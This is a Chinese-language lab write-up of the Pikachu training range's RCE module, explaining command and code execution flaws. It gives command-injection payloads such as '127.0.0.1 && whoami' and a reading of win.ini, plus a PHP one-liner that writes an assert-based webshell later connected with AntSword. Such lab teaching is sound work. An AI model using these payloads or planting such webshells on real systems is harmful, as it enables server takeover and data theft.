RCE 模块
参考文章Pikachu靶场之RCE漏洞详解_pikachu rce-CSDN博客
RCE(remote command/code execute ,远程命令执行)
命令执行一般发生在远程,故被称为远程命令执行。
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
应用系统从设计上需要给用户提供指定的远程命令操作的接口。( 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
如果设计者在此输入界面的功能上没有做严格的安全控制,攻击者就可以通过此接口注入恶意的命令,让后台执行,从而控制整个后台服务器。
1.exec“ping”
现在来做第一关,先ping一下本机127.0.0.1
然后可以看到出现了很多乱码
由于windows和linux有3个命令连接符是相同的(|,||,&&),因此在不知道目标的具体操作系统的情况下,可以先用这三种测试。命令就用whoami
为啥用whoami命令呢?因为这个命令不但windows和linux系统都支持(windows xp不默认支持,可安装),而且显示的内容不同,不但可以用来判断是否有远程命令执行漏洞,还可以用来判断操作系统(linux系统中显示当前执行操作的用户名,windows系统中显示当前登录的域名和用户名)
查看用户 构造payload:127.0.0.1 && whoami
构造palyload:127.0.0.1 && dir 就能看件到当先路径和路径下的文件
查看文件内容win.ini
payload :127.0.0.1 && type C:\Windows\win.ini
代码中,首先$ _POST[‘ipaddress’]赋值给了$ip ,然后没有经过任何处理直接就传入shell_exec()函数执行,造成命令可拼接执行。
2.exec“evel”
eval():会将符合PHP 语法规范字符串当作php代码执行。
输入phpinfo();
点击提交之后,phpinfo()函数被执行了
当然我们也有另一种方法,我们也可以上传一句话木马进行攻击
在对话框中输入一句话木马
fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');
就可以看到在pikachu中的文件中看到shell.php木马文件已经上传了
打开蚁键进行连接
成功连接就能进入对方电脑的后台了,可以看到对方的所有文件,攻击成功!